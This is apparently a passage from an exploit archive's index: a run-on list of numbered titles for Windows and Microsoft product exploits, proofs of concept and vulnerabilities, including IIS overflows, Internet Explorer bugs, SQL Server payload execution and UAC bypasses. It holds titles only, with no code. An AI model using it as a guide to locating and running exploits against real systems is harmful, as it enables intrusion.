Explorer 4/5/6 Embedded Image URI Obfuscation Weakness [24101] Microsoft Outlook 2003 Predictable File Location Weakness [24069] Microsoft Internet Explorer 6.0 Meta Data Foreign Domain Spoofing Vulnerability [24020] Microsoft Internet Explorer Option Element Use-After-Free [24002] Microsoft Outlook Express 6.0 - Remote Denial of Service Vulnerability [23912] Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability [23911] Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability [23903] Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability [23796] Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability [23790] Microsoft Internet Explorer 5 window.open Search Pane Cross-Zone Scripting Vulnerability [23785] Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability [23768] Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability [23766] Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability [23754] Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability [23695] Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability [23679] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (2) [23678] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (1) [23668] Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness [23649] Microsoft SQL Server Database Link Crawling Command Execution [23643] Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy Vulnerability [23531] HD Soft Windows FTP Server 1.5/1.6 Username Format String Vulnerability [23493] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (3) [23492] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (2) [23491] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (1) [23490] Microsoft IIS 5.0 Failure To Log Undocumented TRACK Requests Vulnerability [23401] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2) [23400] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (1) [23340] Microsoft Internet Explorer 6.0 Double Slash Cache Zone Bypass Vulnerability [23321] Microsoft Internet Explorer 6-10 Mouse Tracking [23283] Microsoft Internet Explorer 6.0 - Local Resource Reference Vulnerability [23273] Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability [23255] Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability [23216] Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability [23215] Microsoft Internet Explorer 6 Absolute Position Block Denial of Service Vulnerability [23131] Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities [23122] Microsoft Internet Explorer 5 XML Page Object Type Validation Vulnerability [23114] Microsoft Internet Explorer 5/6 Browser Popup Window Object Type Validation Vulnerability [23113] Microsoft Exchange Server 4.0/5.0 SMTP HELO Argument Buffer Overflow Vulnerability [23096] Microsoft WordPerfect Converter Buffer Overrun Vulnerability [23095] Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability [23094] Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 Document Handling Buffer Overrun Vulnerability [23083] MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) [23044] Microsoft Internet Explorer 5/6 Object Type Validation Vulnerability [23034] Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness [23007] Windows AlwaysInstallElevated MSI [22959] Microsoft Outlook Express 5/6 Script Execution Weakness [22957] Microsoft SQL Server 7.0/2000,MSDE Named Pipe Denial of Service Vulnerability [22919] Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities [22869] Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution Vulnerability [22850] Microsoft Office OneNote 2010 Crash PoC [22784] Microsoft Internet Explorer 5 Custom HTTP Error HTML Injection Vulnerability [22783] Microsoft Internet Explorer 5/6 MSXML XML File Parsing Cross-Site Scripting Vulnerability [22734] Microsoft Internet Explorer 6 %USERPROFILE% File Execution Weakness [22728] Microsoft Internet Explorer 5 Classic Mode FTP Client Cross Domain Scripting Vulnerability [22726] Microsoft Internet Explorer 5 OBJECT Tag Buffer Overflow Vulnerability [22679] Microsoft Visio 2010 Crash PoC [22670] Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability [22655] Microsoft Publisher 2013 Crash PoC [22621] Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability [22591] Microsoft Office Excel 2007 - WriteAV Crash PoC [22576] Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 Buffer Overrun Vulnerability [22563] Microsoft IIS 5 User Existence Disclosure Vulnerability (2) [22562] Microsoft IIS 5 User Existence Disclosure Vulnerability (1) [22555] Microsoft BizTalk Server 2000/2002 DTA RawCustomSearchField.asp SQL Injection [22554] Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability [22553] Microsoft BizTalk Server 2002 HTTP Receiver Buffer Overflow Vulnerability [22530] Microsoft Internet Explorer 5 Remote URLMON.DLL Buffer Overflow Vulnerability [22518] Microsoft Shlwapi.dll 6.0.2800 .1106 Malformed HTML Form Tag DoS Vulnerability [22489] Windows XP PRO SP3 - Full ROP calc shellcode [22390] Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service Vulnerability [22330] Microsoft Office Excel 2010 Crash PoC [22310] Microsoft Office Publisher 2010 Crash PoC [22288] Microsoft Internet Explorer 5/6 Self Executing HTML File Vulnerability [22280] Microsoft Outlook2000/Express 6.0 Arbitrary Program Execution Vulnerability [22251] AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow [22237] Microsoft Office Picture Manager 2010 Crash PoC [22226] Microsoft Internet Explorer 5 ShowHelp Arbitrary Command Execution Vulnerability [22215] Microsoft Office Word 2010 Crash PoC [22119] Microsoft Pocket Internet Explorer 3.0 - Denial of Service Vulnerability [22027] Microsoft Java Virtual Machine 3802 Series Bytecode Verifier Vulnerability [21994] Windows Escalate Service Permissions Local Privilege Escalation [21986] Windows Media Player 10 - .avi Integer Division By Zero Crash PoC [21959] Microsoft Internet Explorer 5/6 Cached Objects Zone Bypass Vulnerability [21932] Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow Vulnerability [21923] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (2) [21922] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (1) [21920] Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability [21910] Microsoft IIS 5.0 IDC Extension Cross Site Scripting Vulnerability [21902] MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow [21898] SurfControl SuperScout WebFilter for windows 2000 SQL Injection Vulnerability [21897] SurfControl SuperScout WebFilter for windows 2000 File Disclosure Vulnerability [21883] Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability [21845] Windows Escalate UAC Protection Bypass [21843] Windows Escalate UAC Execute RunAs [21840] MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability [21803] Microsoft Internet Explorer 6 URI Handler Restriction Circumvention Vulnerability [21750] Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant Vulnerability [21749] Microsoft Internet Explorer 5/6 XML Redirect File Disclosure Vulnerability [21747] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2) [21746] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1) [21721] Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability [21718] Microsoft SQL 2000/7.0 Agent Jobs Privilege Elevation Vulnerability [21711] Microsoft Outlook Express 5/6 MHTML URL Handler File Rendering Vulnerability [21705] Microsoft Internet Explorer 6.0 File Attachment Script Execution Vulnerability [21703] Citrix Metaframe for Windows NT 4.0 TSE 1.8 Java ICA Environment DoS [21693] Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability [21691] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (8) [21690] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (7) [21689] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (6) [21688] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (5) [21687] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (4) [21686] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (3) [21685] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (2) [21684] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (1) [21662] Microsoft Outlook Express 6 XML File Attachment Script Execution Vulnerability [21652] Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability [21651] Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability [21650] Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability [21631] Microsoft Outlook Express 5/6 Spoofable File Extensions Vulnerability [21625] Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass [21613] Microsoft IIS 4/5 SMTP Service Encapsulated SMTP Address Vulnerability [21601] Microsoft Foundation Class Library 7.0 ISAPI Buffer Overflow Vulnerability [21556] Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service [21555] Cisco Secure ACS for Windows NT 3.0 Cross-site Scripting Vulnerability [21549] Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability [21541] Microsoft SQL Server 2000 SQLXML Script Injection Vulnerability [21540] Microsoft SQL Server 2000 SQLXML Buffer Overflow Vulnerability [21530] Seanox DevWex Windows Binary 1.2002.520 File Disclosure [21481] Microsoft MSN Messenger 1-4 Malformed Invite Request Denial of Service [21452] Microsoft Internet Explorer 5.0.1/6.0 Content-Disposition Handling File Execution Vulnerability [21419] Microsoft Outlook Express 5.5 DoS Device Denial of Service Vulnerability [21404] Microsoft Internet Explorer 5/6 Self-Referential Object Denial of Service Vulnerability [21387] WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow [21385] Microsoft IIS 5.0 CodeBrws.ASP Source Code Disclosure Vulnerability [21376] Microsoft Internet Explorer 5.5/6.0 History List Script Injection Vulnerability [21372] Microsoft IIS 4/5 HTTP Error Page Cross Site Scripting Vulnerability [21371] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (4) [21370] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (3) [21369] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2) [21368] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (1) [21361] Microsoft Internet Explorer 5 Cascading Style Sheet File Disclosure Vulnerability [21313] Microsoft IIS 4.0/5.0/5.1 Authentication Method Disclosure Vulnerability [21260] Microsoft Site Server 3.0 Cross-Site Scripting Vulnerability [21225] John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability [21199] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (2) [21198] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (1) [21195] Microsoft Internet Explorer 5/6 GetObject File Disclosure Vulnerability [21189] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (2) [21188] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (1) [21177] Microsoft IIS 5.0 False Content-Length Field DoS Vulnerability [21164] Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability [21144] Microsoft Internet Explorer 5/6 Cookie Disclosure/Modification Vulnerability [21127] Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing Vulnerability [21118] Microsoft Internet Explorer 5 Zone Spoofing Vulnerability [21113] Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability [21072] Microsoft IIS 5.0 In-Process Table Privelege Elevation Vulnerability [21071] Microsoft IIS 4/5 SSI Buffer Overrun Privelege Elevation [21040] Windows 98 ARP Denial of Service Vulnerability [21004] Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability [21003] Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability [20997] HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS [20991] Microsoft IIS 4.0/5.0 Device File Remote DoS Vulnerability [20989] Microsoft IIS 4.0/5.0 Device File Local DoS Vulnerability [20912] Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability [20903] Microsoft Internet Explorer 5.5 File Disclosure Vulnerability [20899] Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability [20893] Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 Remote Reconfiguration Vulnerability [20880] MS Windows 2000 Debug Registers Vulnerability [20846] Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability [20818] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4) [20817] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3) [20816] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2) [20815] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1) [20814] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5) [20813] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4) [20812] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3) [20811] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2) [20810] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1) [20802] Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability [20782] Microsoft IE 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability [20770] GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service [20763] Microsoft ISA Server 2000 Web Proxy DoS Vulnerability [20688] Qualcomm Eudora 5.0.2 'Use Microsoft Viewer' Code Execution Vulnerability [20680] Microsoft IE 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability [20664] Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability [20605] Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability [20590] Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability [20571] Microsoft Outlook 2000 0/98 0/Express 5.5 Concealed Attachment Vulnerability [20543] Windows Service Trusted Path Privilege Escalation [20515] Microsoft Internet Explorer 5.0.1/5.5 'mstask.exe' CPU Consumption Vulnerability [20508] Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack [20481] Microsoft IIS 2.0/3.0 Appended Dot Script Source Disclosure Vulnerability [20472] IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability [20470] IBM DB2 Universal Database for Windows NT 6.1/7.1 SQL DoS Vulnerability [20459] Microsoft Internet Explorer 5 \'INPUT TYPE=FILE\' Vulnerability [20457] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability [20456] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability [20451] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability [20440] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (4)" [20439] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (3)" [20438] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (2)" [20437] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (1)" [20426] Microsoft Internet Explorer 5.5 Index.dat Vulnerability [20384] Microsoft IIS 4.0/5.0 Executable File Parsing Vulnerability [20383] Microsoft IIS 4.0 ISAPI Buffer Overflow Vulnerability [20324] iplanet certificate management system 4.2 for windows nt 4.0 - Directory Traversal [20310] Microsoft IIS 4.0 Pickup Directory DoS Vulnerability [20309] Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability [20306] Microsoft Virtual Machine Arbitrary Java Codebase Execution Vulnerability [20305] Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability [20289] Microsoft NetMeeting 3.0.1 4.4.3385 Remote Desktop Sharing DoS Vulnerability [20269] Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability [20235] Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability [20232] MS Windows 2000/NT 4 DLL Search Path Weakness [20219] WebTV for Windows 98/ME DoS Vulnerability [20174] Microsoft Internet Explorer Fixed Table Col Span Heap Overflow [20152] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (2)" [20151] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (1)" [20122] Microsoft Office SharePoint Server 2007 Remote Code Execution [20096] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 Internal IP Address Disclosure Vulnerability [20089] Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability [20079] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2) [20078] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (1) [20006] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (2) [20005] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (1) [19968] Windows 2000/95/98/NT 4.0 Long Filename Extension Vulnerability [19930] Windows Escalate Task Scheduler XML Privilege Escalation [19928] Microsoft Active Movie Control 1.0 Filetype Vulnerability [19908] Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability [19907] Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability [19830] Microsoft Index Server 2.0 '%20' ASP Source Disclosure Vulnerability [19827] NT 4.0 / Windows 2000 TCP/IP Printing Service DoS Vulnerability [19815] vqsoft vqserver for windows 1.9.9 - Directory Traversal vulnerability [19799] Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 MS DoS Device Name DoS [19789] Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability [19743] Cat Soft Serv-U 2.5/a/b,Windows 2000/95/98/NT 4.0 Shortcut Vulnerability [19742] microsoft iis 3.0/4.0,microsoft index server 2.0 - Directory Traversal [19734] Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability [19733] McAfee 4.0,Network Associates for Windows NT 4.0.2/4.0.3 a,Norton AntiVirus 2000 Recycle Bin Exclusion [19728] Microsoft Systems Management Server 2.0 Default Permissions Vulnerability [19638] Microsoft SQL Server 7.0/7.0 SP1 NULL Data DoS Vulnerability [19637] MS IE 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability [19633] Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow [19608] Windows 95/98 UNC Buffer Overflow Vulnerability (2) [19607] Windows 95/98 UNC Buffer Overflow Vulnerability (1) [19594] MS Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability [19516] Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow [19515] MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow [19473] Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability [19471] Microsoft Internet Explorer 5.0 HTML Form Control DoS [19445] Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability [19435] Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability [19425] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2) [19424] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1) [19415] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3) [19414] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2) [19413] Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1) [19376] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability [19361] Microsoft IIS 3.0/4.0 Double Byte Code Page Vulnerability [19248] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (4) [19247] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (3) [19246] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (2) [19245] Microsoft IIS 4.0 - Buffer Overflow Vulnerability (1) [19228] Microsoft IIS 4.0,Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability [19208] Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Vulnerability [19207] Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service Vulnerability [19194] Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability [19186] Microsoft XML Core Services MSXML Uninitialized Memory Corruption [19164] Microsoft IE4 Clipboard Paste Vulnerability [19156] Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability [19152] Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability [19144] Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability [19129] Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability [19118] Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability [19089] Windows OpenType Font - File Format DoS Exploit [19083] Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability [19037] MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability [19033] microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities [19026] Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow [18952] Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability [18894] Windows XP Keyboard Layouts Pool Corruption LPE 0day PoC (post-MS12-034) [18759] TFTP Server for Windows 1.4 ST WRQ Buffer Overflow [18606] Microsoft Terminal Services Use After Free (MS12-020) [18365] Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability [18334] Microsoft Office 2003 Home/Pro 0day [18272] Windows Explorer Denial of Service (DOS) [18271] Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS) [18143] MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow [18087] MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow [18078] Microsoft Excel 2003 11.8335.8333 Use After Free [18067] Microsoft Excel 2007 SP2 Buffer Overwrite Exploit [17830] Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption [17796] Windows Server 2008 R1 Local Denial of Service [17783] ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit [17659] MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow [17476] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053] [17451] Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability [17399] Microsoft Office XP Remote code Execution [17398] Windows Media Player with K-Lite Codec Pack DoS PoC [17227] Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC [17164] Microsoft Reader <= 2.1.1.3143 NULL Byte Write [17163] Microsoft Reader <= 2.1.1.3143 Array Overflow [17162] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17161] Microsoft Reader <= 2.1.1.3143 Heap Overflow [17160] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17159] Microsoft Host Integration Server <= 8.5.4224.0 DoS Vulnerabilities [17158] Microsoft HTML Help <= 6.1 Stack Overflow [17072] Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC [16991] Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions [16750] Microsoft Message Queueing Service DNS Name Path Overflow [16749] Microsoft RPC DCOM Interface Overflow [16748] Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) [16747] Microsoft Message Queueing Service Path Overflow [16740] Microsoft IIS FTP Server NLST Response Overflow [16698] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) [16686] Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) [16680] Microsoft Visual Basic VBP Buffer Overflow [16665] Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow [16649] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit [16625] Microsoft Excel Malformed FEATHEADER Record Vulnerability [16615] Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption [16612] Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution [16608] Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow [16605] Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download [16545] Microsoft Help Center XSS and Command Execution [16542] Microsoft OWC Spreadsheet HTMLURL Buffer Overflow [16537] Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption [16526] Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) [16521] Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow [16516] Microsoft WMI Administration Tools ActiveX Buffer Overflow [16507] Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow [16472] Microsoft IIS 5.0 IDQ Path Overflow [16471] Microsoft IIS WebDAV Write Access Code Execution [16470] Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow [16469] Microsoft IIS 5.0 Printer Host Header Overflow [16468] Microsoft IIS 4.0 .HTR Path Overflow [16467] Microsoft IIS/PWS CGI Filename Double Decode Command Execution [16442] Microsoft DirectX DirectShow SAMI Buffer Overflow [16427] Windows RSH daemon Buffer Overflow [16403] CA BrightStor Agent for Microsoft SQL Overflow [16398] Microsoft SQL Server Hello Overflow [16396] Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection [16395] Microsoft SQL Server Payload Execution [16394] Microsoft SQL Server Payload Execution via SQL injection [16393] Microsoft SQL Server Resolution Overflow [16392] Microsoft SQL Server sp_replwritetovarbin Memory Corruption [16379] Microsoft Outlook Express NNTP Response Parsing Buffer Overflow [16378] Microsoft Workstation Service NetAddAlternateComputerName Overflow [16377] Microsoft ASN.1 Library Bitstring Heap Overflow [16375] Microsoft RRAS Service RASMAN Registry Overflow [16373] Microsoft Services MS06-066 nwapi32.dll [16372] Microsoft Workstation Service NetpManageIPCConnect Overflow [16371] Microsoft NetDDE Service Overflow [16369] Microsoft Services MS06-066 nwwks.dll [16368] Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow [16367] Microsoft Server Service NetpwPathCanonicalize Overflow [16366] Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) [16365] Microsoft Plug and Play Service Overflow [16364] Microsoft RRAS Service Overflow [16362] Microsoft Server Service Relative Path Stack Corruption [16361] Microsoft Print Spooler Service Impersonation Vulnerability [16359] Microsoft WINS Service Memory Overwrite [16358] Microsoft IIS ISAPI RSA WebAgent Redirect Overflow [16357] Microsoft IIS Phone Book Service Overflow [16356] Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow [16355] Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow [16354] Microsoft IIS ISAPI w3who.dll Query String Overflow [16334] Microsoft Private Communications Transport Overflow [16333] Windows Media Services ConnectFunnel Stack Buffer Overflow [16332] Veritas Backup Exec Windows Remote Agent Overflow [16262] MS Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011) [16166] MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow [16071] Microsoft Internet Explorer MHTML Protocol Handler XSS [16024] Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption [15984] MS11-002: Microsoft Data Access Components Vulnerability [15963] MS10-081: Windows Common Control Library (Comctl32) Heap Overflow [15894] MS10-073 Windows Class Handling Vulnerability [15803] Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC [15758] Windows Win32k Pointer Dereferencement PoC (MS10-098) [15609] Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day [15589] Windows Task Scheduler Privilege Escalation 0day [15319] Apache 2.2 (Windows) Local Denial of Service [15297] Windows Mobile 6.1 and 6.5 Double Free Denial of Service [15266] Windows NTLM Weak Nonce Vulnerability [15262] Microsoft Office HtmlDlgHelper Class Memory Corruption [15167] Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065) [15158] MOAUB #30 - Microsoft Unicode Scripts 